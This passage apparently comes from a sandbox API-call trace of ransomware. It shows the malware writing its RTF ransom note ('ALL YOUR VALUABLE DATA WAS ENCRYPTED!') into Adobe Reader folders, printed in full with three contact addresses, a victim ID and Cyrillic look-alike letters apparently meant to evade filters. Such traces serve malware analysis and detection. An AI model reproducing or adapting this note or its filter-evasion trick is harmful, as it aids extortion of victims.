sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.535] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.536] CloseHandle (hObject=0x1fc) returned 1 [0064.536] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\bg85_info.rtf")) returned 0xffffffff [0064.536] GetLastError () returned 0x2 [0064.536] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.536] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 